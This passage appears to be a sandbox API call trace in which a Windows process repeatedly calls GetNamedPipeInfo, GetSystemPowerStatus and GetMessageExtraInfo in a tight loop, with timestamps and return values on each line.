	[0171.638] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.638] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.638] GetMessageExtraInfo () returned 0x0
	[0171.638] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.638] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.638] GetMessageExtraInfo () returned 0x0
	[0171.638] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.638] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.638] GetMessageExtraInfo () returned 0x0
	[0171.638] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.638] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.638] GetMessageExtraInfo () returned 0x0
	[0171.638] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.638] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.638] GetMessageExtraInfo () returned 0x0
	[0171.638] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.638] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.638] GetMessageExtraInfo () returned 0x0
	[0171.639] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.639] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.639] GetMessageExtraInfo () returned 0x0
	[0171.639] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.639] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.639] GetMessageExtraInfo () returned 0x0
	[0171.639] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.639] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.639] GetMessageExtraInfo () returned 0x0
	[0171.639] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.639] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.639] GetMessageExtraInfo () returned 0x0
	[0171.639] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.639] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.639] GetMessageExtraInfo () returned 0x0
	[0171.639] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.639] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.639] GetMessageExtraInfo () returned 0x0
	[0171.639] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.639] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.639] GetMessageExtraInfo () returned 0x0
	[0171.639] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.639] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.639] GetMessageExtraInfo () returned 0x0
	[0171.639] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.639] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.639] GetMessageExtraInfo () returned 0x0
	[0171.639] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.639] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.639] GetMessageExtraInfo () returned 0x0
	[0171.639] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.639] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.639] GetMessageExtraInfo () returned 0x0
	[0171.639] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.639] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.640] GetMessageExtraInfo () returned 0x0
	[0171.640] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.640] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.640] GetMessageExtraInfo () returned 0x0
	[0171.640] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.640] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.640] GetMessageExtraInfo () returned 0x0
	[0171.640] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.640] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.640] GetMessageExtraInfo () returned 0x0
	[0171.640] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.640] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.640] GetMessageExtraInfo () returned 0x0
	[0171.640] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.640] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.640] GetMessageExtraInfo () returned 0x0
	[0171.640] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.640] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.640] GetMessageExtraInfo () returned 0x0
	[0171.640] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.640] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.640] GetMessageExtraInfo () returned 0x0
	[0171.640] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.640] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.640] GetMessageExtraInfo () returned 0x0
	[0171.640] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.640] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.640] GetMessageExtraInfo () returned 0x0
	[0171.640] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.640] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.640] GetMessageExtraInfo () returned 0x0
	[0171.640] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.640] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.640] GetMessageExtraInfo () returned 0x0
	[0171.640] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.640] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.641] GetMessageExtraInfo () returned 0x0
	[0171.641] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.641] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.641] GetMessageExtraInfo () returned 0x0
	[0171.641] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.641] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.641] GetMessageExtraInfo () returned 0x0
	[0171.641] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.641] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.641] GetMessageExtraInfo () returned 0x0
	[0171.641] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.641] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.641] GetMessageExtraInfo () returned 0x0
	[0171.641] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.641] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.641] GetMessageExtraInfo () returned 0x0
	[0171.641] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.641] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.641] GetMessageExtraInfo () returned 0x0
	[0171.641] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.641] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.641] GetMessageExtraInfo () returned 0x0
	[0171.641] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.641] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.641] GetMessageExtraInfo () returned 0x0
	[0171.641] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.641] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.641] GetMessageExtraInfo () returned 0x0
	[0171.641] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.641] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.641] GetMessageExtraInfo () returned 0x0
	[0171.641] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.641] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.641] GetMessageExtraInfo () returned 0x0
	[0171.641] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.642] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.642] GetMessageExtraInfo () returned 0x0
	[0171.642] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.642] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.642] GetMessageExtraInfo () returned 0x0
	[0171.642] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.642] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.642] GetMessageExtraInfo () returned 0x0
	[0171.642] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.642] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.642] GetMessageExtraInfo () returned 0x0
	[0171.642] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.642] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.642] GetMessageExtraInfo () returned 0x0
	[0171.642] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.642] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.642] GetMessageExtraInfo () returned 0x0
	[0171.642] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.642] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.642] GetMessageExtraInfo () returned 0x0
	[0171.642] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.642] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.642] GetMessageExtraInfo () returned 0x0
	[0171.642] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.642] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.642] GetMessageExtraInfo () returned 0x0
	[0171.642] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.642] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.642] GetMessageExtraInfo () returned 0x0
	[0171.642] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.642] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.642] GetMessageExtraInfo () returned 0x0
	[0171.642] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.642] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.643] GetMessageExtraInfo () returned 0x0
	[0171.643] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.643] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.643] GetMessageExtraInfo () returned 0x0
	[0171.643] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.643] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.643] GetMessageExtraInfo () returned 0x0
	[0171.643] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.643] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.643] GetMessageExtraInfo () returned 0x0
	[0171.643] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.643] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.643] GetMessageExtraInfo () returned 0x0
	[0171.643] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.643] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.643] GetMessageExtraInfo () returned 0x0
	[0171.643] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.643] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.643] GetMessageExtraInfo () returned 0x0
	[0171.643] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.643] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.643] GetMessageExtraInfo () returned 0x0
	[0171.643] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.643] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.643] GetMessageExtraInfo () returned 0x0
	[0171.643] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.643] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.643] GetMessageExtraInfo () returned 0x0
	[0171.643] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.643] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.643] GetMessageExtraInfo () returned 0x0
	[0171.643] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.643] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.643] GetMessageExtraInfo () returned 0x0
